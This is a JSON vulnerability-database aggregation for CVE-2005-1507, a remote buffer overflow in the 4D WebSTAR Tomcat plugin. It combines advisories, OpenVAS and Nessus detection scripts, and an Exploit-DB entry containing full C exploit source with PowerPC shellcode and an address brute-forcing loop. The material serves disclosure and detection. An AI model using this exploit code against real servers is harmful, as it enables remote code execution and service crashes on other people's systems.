{"type": "osvdb", "published": "2005-05-06T13:05:20", "href": "https://vulners.com/osvdb/OSVDB:16154", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "viewCount": 4, "edition": 1, "reporter": "Braden Thomas(bjthomas@usc.edu)", "title": "WebSTAR Tomcat Plugin URL Remote Overflow", "affectedSoftware": [{"operator": "eq", "version": "5.33", "name": "WebSTAR"}, {"operator": "eq", "version": "5.4", "name": "WebSTAR"}], "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2017-04-28T13:20:12", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1507"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231018212", "OPENVAS:18212"]}, {"type": "exploitdb", "idList": ["EDB-ID:25626"]}, {"type": "nessus", "idList": ["4D_WEBSTAR_REMOTE_BUFF_OVERFLOW.NASL"]}], "modified": "2017-04-28T13:20:12", "rev": 2}, "vulnersScore": 6.8}, "references": [], "id": "OSVDB:16154", "lastseen": "2017-04-28T13:20:12", "cvelist": ["CVE-2005-1507"], "modified": "2005-05-06T13:05:20", "description": "## Vulnerability Description\nA remote overflow exists in 4D WebSTAR. The Tomcat plugin fails to validate URLs resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution or denial of service resulting in a loss of integrity, and/or availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in 4D WebSTAR. The Tomcat plugin fails to validate URLs resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution or denial of service resulting in a loss of integrity, and/or availability.\n## References:\nVendor URL: http://www.4d.com/\n[Secunia Advisory ID:15278](https://secuniaresearch.flexerasoftware.com/advisories/15278/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0086.html\n[CVE-2005-1507](https://vulners.com/cve/CVE-2005-1507)\nBugtraq ID: 13538\n"}

{"cve": [{"lastseen": "2020-10-03T11:34:54", "description": "Buffer overflow in the Tomcat plugin in 4d WebSTAR 5.33 and 5.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long URL.", "edition": 3, "cvss3": {}, "published": "2005-05-11T04:00:00", "title": "CVE-2005-1507", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1507"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:4d:webstar:5.4", "cpe:/a:4d:webstar:5.3.3"], "id": "CVE-2005-1507", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1507", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:4d:webstar:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:4d:webstar:5.3.3:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-08T11:44:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1507"], "description": "The remote server is running 4D WebStar Web Server.\n\nThe remote server is vulnerable to a remote buffer overflow \nin its Tomcat plugin.\n\nA malicious user may be able to crash service or execute\narbitrary code on the computer with the privileges of the\nHTTP server.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:18212", "href": "http://plugins.openvas.org/nasl.php?oid=18212", "type": "openvas", "title": "4D WebStar Tomcat Plugin Remote Buffer Overflow flaw", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: 4d_webstar_remote_buff_overflow.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: 4D WebStar Tomcat Plugin Remote Buffer Overflow flaw\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n#\n# Copyright:\n# Copyright (C) 2005 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote server is running 4D WebStar Web Server.\n\nThe remote server is vulnerable to a remote buffer overflow \nin its Tomcat plugin.\n\nA malicious user may be able to crash service or execute\narbitrary code on the computer with the privileges of the\nHTTP server.\";\n\ntag_solution = \"Upgrade to latest version of this software\";\n\n# Ref: Braden Thomas <bjthomas@usc.edu>\n\nif(description)\n{\n script_id(18212);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2005-1507\");\n script_bugtraq_id(13538, 14192);\n script_xref(name:\"OSVDB\", value:\"16154\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n \n name = \"4D WebStar Tomcat Plugin Remote Buffer Overflow flaw\";\n script_name(name);\n \n\n\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n \n \n script_copyright(\"This script is Copyright (C) 2005 David Maciejak\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"4D_WebSTAR/banner\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"ftp_func.inc\");\n\n\n# 4D runs both FTP and WWW on the same port\nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\n\nbanner = get_http_banner(port:port);\nif ( ! banner ) exit(0);\n# Server: 4D_WebSTAR_S/5.3.3 (MacOS X)\nif ( \"4D_WebSTAR\" >< banner &&\n egrep(pattern:\"^Server: 4D_WebSTAR.*/([0-4]\\.|5\\.([0-2]\\.|3\\.|4[^.]))\", string:banner) ) security_message(port);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-02-04T16:37:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1507"], "description": "The remote 4D WebStar Web Server is vulnerable to a remote buffer overflow\n in its Tomcat plugin.", "modified": "2019-12-18T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231018212", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231018212", "type": "openvas", "title": "4D WebStar Tomcat Plugin Remote Buffer Overflow flaw", "sourceData": "# OpenVAS Vulnerability Test\n# Description: 4D WebStar Tomcat Plugin Remote Buffer Overflow flaw\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n#\n# Copyright:\n# Copyright (C) 2005 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.18212\");\n script_version(\"2019-12-18T08:24:18+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 08:24:18 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2005-1507\");\n script_bugtraq_id(13538, 14192);\n script_xref(name:\"OSVDB\", value:\"16154\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"4D WebStar Tomcat Plugin Remote Buffer Overflow flaw\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2005 David Maciejak\");\n script_family(\"Gain a shell remotely\");\n script_dependencies(\"gb_webstar_detect.nasl\");\n script_mandatory_keys(\"4d/webstar/detected\");\n\n script_tag(name:\"solution\", value:\"Upgrade to latest version of this software.\");\n\n script_tag(name:\"summary\", value:\"The remote 4D WebStar Web Server is vulnerable to a remote buffer overflow\n in its Tomcat plugin.\");\n\n script_tag(name:\"impact\", value:\"A malicious user may be able to crash service or execute\n arbitrary code on the computer with the privileges of the HTTP server.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:4d:webstar\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less_equal( version: version, test_version: \"5.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"Update to the latest version\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T01:48:48", "description": "4D WebStar 5.3/5.4 Tomcat Plugin Remote Buffer Overflow Vulnerability. CVE-2005-1507. Remote exploit for osx platform", "published": "2005-05-06T00:00:00", "type": "exploitdb", "title": "4D WebStar 5.3/5.4 Tomcat Plugin Remote Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1507"], "modified": "2005-05-06T00:00:00", "id": "EDB-ID:25626", "href": "https://www.exploit-db.com/exploits/25626/", "sourceData": "source: http://www.securityfocus.com/bid/13538/info\r\n\r\nThe Tomcat Plugin supplied with the HTTP server is reportedly prone to a remote buffer overflow vulnerability.\r\n\r\nA successful attack can result in a crash or arbitrary code execution allowing the attacker to gain unauthorized access to the affected computer.\r\n\r\nThe Tomcat Plugin is enabled by default.\r\n\r\n4D WebStar 5.3.3 and 5.4 were reported to be vulnerable. \r\n\r\n/* 4d buffer overflow\r\nBraden Thomas\r\n\r\n the buffer is copied byte by byte starting from the beginning of\r\nthe buffer\r\n until a NULL byte is reached (or a couple other types of bytes)\r\n the buffer is copied from a pointer that resides past the end of\r\nthe buffer\r\n the buffer can overflow over this pointer, allowing the program\r\nto read bytes to wherever it wants\r\n\r\n -the exploit must restore this pointer or risk reading from null\r\nmemory, terminating overflow\r\n -the pointer is different each time, though it's location in\r\nrelation to the buffer is static (buffer+1285)\r\n -the pointer is overwritten byte by byte, meaning that one wrong\r\nbyte, and we're reading from\r\n somewhere else... which can be potentially bad in terms\r\nof exploitation\r\n\r\n method:\r\n -exploit attempts to: overwrite the pointer so that the memory\r\nwill continue to be overflowed\r\n (i.e., do not point into any memory that contains a null byte)\r\n -exploit attempts to continue overflowing with return addresses,\r\nto overflow where LR is stored\r\n -when loop ends and LR is restored, it will return execution\r\ninto the buffer and into shellcode\r\n -some looping has been added, where BUFADDR is enumerated to try\r\nto brute force the overflow\r\n because failed servers are respawned\r\n\r\n results:\r\n actually successful in moving the execution pointer about 10\r\nto 25% of the time\r\n unsuccessful in actually jumping to the nops/shellcode :(\r\n\r\n problems I don't understand:\r\n occasionally other threads crash in weird places (memcpy and\r\nszone_malloc)...\r\n this might actually be when it works as desired and\r\ndoesn't crash... but other threads do crash\r\n before shellcode can do its magic!\r\n (but that's just a hypothesis) :)\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/socket.h>\r\n#include <sys/wait.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <sys/time.h>\r\n\r\nunsigned char shellcode[]= // no 0x00 0x20 0x3f 0x24 0x2f\r\n\"\\x7c\\x63\\x1a\\x79\\x40\\x82\\xff\\xfd\\x7d\\xa8\\x02\\xa6\\x38\\xc3\\xe1\\x35\"\r\n\"\\x39\\x80\\x01\\x18\\x39\\xad\\x1f\\xff\\x81\\xcd\\xe1\\x39\\x81\\xed\\xe1\\x35\"\r\n\"\\x7d\\xef\\x72\\x78\\x91\\xed\\xe1\\x35\\x7c\\x06\\x68\\xac\\x7c\\x01\\x04\\xac\"\r\n\"\\x7c\\x06\\x6f\\xac\\x4c\\x01\\x01\\x2c\\x39\\xad\\xff\\xfc\\x39\\x8c\\xff\\xfb\"\r\n\"\\x7d\\x8c\\x63\\x79\\x40\\x82\\xff\\xd8\\x3b\\xe0\\x30\\xff\\x7f\\xe0\\x4e\\x70\"\r\n\"\\x44\\xff\\xff\\x02\\x7c\\x63\\x1a\\x79\\x7c\\x63\\x1a\\x79\\x7c\\x63\\x1a\\x79\"\r\n\"\\x10\\x29\\x25\\xcb\\x10\\xc9\\x25\\xc8\\x10\\xe9\\x25\\xcf\\x10\\x49\\x25\\xa8\"\r\n\"\\x6c\\x49\\x25\\xcb\\x54\\x49\\x27\\xb1\\x54\\x37\\x3e\\xb1\\x60\\x49\\x25\\xc4\"\r\n\"\\x28\\x4b\\x3e\\xf0\\x28\\x49\\x25\\xc9\\x54\\xc1\\x27\\x6f\\x10\\xe9\\x25\\xd9\"\r\n\"\\x10\\x49\\x25\\xa1\\x57\\x8a\\xd6\\xb1\\x6c\\x49\\x25\\xcb\\x54\\x49\\x27\\xb1\"\r\n\"\\x10\\x49\\x25\\xa3\\x57\\x8a\\xd6\\xb1\\x6c\\x49\\x25\\xcb\\x54\\x49\\x27\\xb1\"\r\n\"\\x57\\x8a\\xd6\\xb1\\x10\\x49\\x25\\xd7\\x10\\xc9\\x25\\xd9\\xb8\\xc8\\xda\\x21\"\r\n\"\\x10\\xe8\\xda\\x21\\x10\\xc8\\xda\\x39\\x6c\\x49\\x25\\xcb\\x54\\x49\\x27\\xb1\"\r\n\"\\x54\\x37\\x3e\\xb1\\x10\\xe9\\x25\\xcb\\x10\\x49\\x25\\x93\\x57\\x8a\\xd6\\xb1\"\r\n\"\\x54\\xed\\x0e\\xb1\\x6c\\x49\\x25\\xcb\\x54\\x49\\x27\\xb1\\x10\\xec\\xda\\x36\"\r\n\"\\x04\\x4c\\xda\\x36\\x68\\xcb\\xda\\x2c\\x10\\x49\\x25\\x8b\\x6c\\x49\\x25\\xcb\"\r\n\"\\x54\\x49\\x27\\xb1\\x54\\xec\\x0f\\xb0\\x68\\xcb\\xda\\x34\\x54\\x21\\x27\\x6f\"\r\n\"\\x10\\x2a\\x25\\xe1\\xb8\\x28\\xda\\x31\\xb8\\xe8\\xda\\x35\\x10\\xc8\\xda\\x31\"\r\n\"\\x10\\x49\\x25\\xf2\\x54\\x49\\x21\\x65\\x6c\\x49\\x25\\xcb\\x54\\x49\\x27\\xb1\"\r\n\"\\x57\\xa9\\x25\\xc1\\x07\\x2b\\x4c\\xa7\\x07\\x2a\\x56\\xa1\\x28\\x49\\x25\\xc9\"\r\n\"\\x28\\x49\\x25\\xc9\";\r\n\r\n#define BUFSIZE 1400\r\nlong BUFADDR= 0x284fe04;//0x02850204;\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n printf(\"4d WebSTAR buffer overflow\\n\");\r\n printf(\"\\tBraden Thomas\\n\");\r\n\r\n if (argc<2)\r\n {\r\n printf(\"4dbo <target>\\n\");\r\n return 1;\r\n }\r\n\r\n struct sockaddr_in their_addr;\r\n their_addr.sin_family = AF_INET;\r\n their_addr.sin_port = htons(80);\r\n inet_aton(argv[1], &(their_addr.sin_addr));\r\n memset(&(their_addr.sin_zero), '\\0', 8);\r\n\r\n\r\n int count=0;\r\n while (1)\r\n {\r\n\r\n char buffer[BUFSIZE];\r\n\r\n // [nops][shellcode][ret addrs][readaddr][more ret addrs]\r\n\r\n memset(buffer,0x60,sizeof(buffer)); // nops first\r\n\r\n int shellcodeLen = sizeof(shellcode)-1;\r\n memset(shellcode,'A',shellcodeLen); // just\r\nfor testing!\r\n\r\n memcpy(buffer+400+5,shellcode,shellcodeLen); // next\r\nshellcode\r\n\r\n\r\n unsigned long retaddr = BUFADDR + 0x1600; // as if it\r\nmatters... this never works!\r\n unsigned long *bufPtr = (unsigned long*)(buffer+400\r\n+shellcodeLen+5); // now for ret addrs\r\n int bufCnt;\r\n for (bufCnt=400+shellcodeLen;bufCnt<BUFSIZE;bufCnt+=4)\r\n {\r\n memcpy(bufPtr,&retaddr,4);\r\n bufPtr++;\r\n }\r\n\r\n unsigned long readaddr = BUFADDR; // now ptr read\r\naddress\r\n // just a\r\nguess... works pretty well tho\r\n memcpy(buffer+1285,&readaddr,4);\r\n\r\n memcpy(buffer,\"GET /\",5);\r\n char httpStr[]=\" HTTP/1.1\\r\\n\\r\\n\";\r\n memcpy(buffer+BUFSIZE-sizeof(httpStr),httpStr,sizeof(httpStr));\r\n\r\n if (!count)\r\n printf(\"\\nRead addr: 0x%x\\nReturn addr: 0x%x\r\n\\n\",readaddr,retaddr);\r\n\r\n\r\n int sockfd = socket(AF_INET, SOCK_STREAM, 0);\r\n if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof\r\n(struct sockaddr)) == -1)\r\n {\r\n printf(\"connect error\\n\");\r\n return 1;\r\n }\r\n if (send(sockfd, buffer, sizeof(buffer)-1, 0) == -1)\r\n {\r\n printf(\"send error\\n\");\r\n return 1;\r\n }\r\n\r\n struct timeval time;\r\n fd_set mySet;\r\n FD_ZERO(&mySet);\r\n FD_SET(sockfd, &mySet);\r\n time.tv_sec = 40;\r\n time.tv_usec = 0;\r\n if (!select(sockfd+1, &mySet, NULL, NULL, &time))\r\n {\r\n printf(\"\\nNo response received.\\n\");\r\n break;\r\n }\r\n else\r\n {\r\n char resBuff[64];\r\n int readRes = recv(sockfd, resBuff, sizeof(resBuff), 0);\r\n if (!readRes)\r\n {\r\n printf(\"\\nZero length response.\\n\");\r\n }\r\n else if (!(count%21))\r\n printf(\"\\nResponse length: %d\", readRes);\r\n else\r\n printf(\".\");\r\n\r\n count++;\r\n\r\n if (count>=100)\r\n {\r\n count=0;\r\n BUFADDR+=0x200;\r\n if (BUFADDR>0x285c000)\r\n BUFADDR=0x284f204;\r\n }\r\n\r\n }\r\n\r\n close(sockfd);\r\n }\r\n return 0;\r\n}\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25626/"}], "nessus": [{"lastseen": "2020-06-16T00:40:11", "description": "The remote server is running 4D WebSTAR Web Server. \n\nAccording to its banner, the remote version of 4D WebSTAR has a buffer\noverflow in its Web Server Tomcat plugin, included and activated by\ndefault. By sending a malicious packet, an attacker may be able to\ncrash the affected service or possibly execute arbitrary code on the\naffected host, although that appears to be improbable.", "edition": 17, "published": "2005-05-09T00:00:00", "title": "4D WebSTAR Tomcat Plugin Remote Buffer Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1507"], "modified": "2005-05-09T00:00:00", "cpe": [], "id": "4D_WEBSTAR_REMOTE_BUFF_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/18212", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18212);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n \n script_cve_id(\"CVE-2005-1507\");\n script_bugtraq_id(13538, 14192);\n\n script_name(english:\"4D WebSTAR Tomcat Plugin Remote Buffer Overflow\");\n script_summary(english:\"Checks for 4D WebSTAR\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is susceptible to a remote buffer overflow\nattack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote server is running 4D WebSTAR Web Server. \n\nAccording to its banner, the remote version of 4D WebSTAR has a buffer\noverflow in its Web Server Tomcat plugin, included and activated by\ndefault. By sending a malicious packet, an attacker may be able to\ncrash the affected service or possibly execute arbitrary code on the\naffected host, although that appears to be improbable.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/May/85\");\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/05/09\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/05/06\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2020 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"ftp_func.inc\");\n\n\n# 4D runs both FTP and WWW on the same port\nport = get_http_port(default:80, embedded:TRUE);\nif(!get_port_state(port))exit(0);\n\nbanner = get_http_banner(port:port);\nif ( ! banner ) exit(0);\n# Server: 4D_WebSTAR_S/5.3.3 (MacOS X)\nif ( \"4D_WebSTAR\" >< banner &&\n egrep(pattern:\"^Server: 4D_WebSTAR.*/([0-4]\\.|5\\.([0-2]\\.|3\\.|4[^.]))\", string:banner) ) security_warning(port);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}]}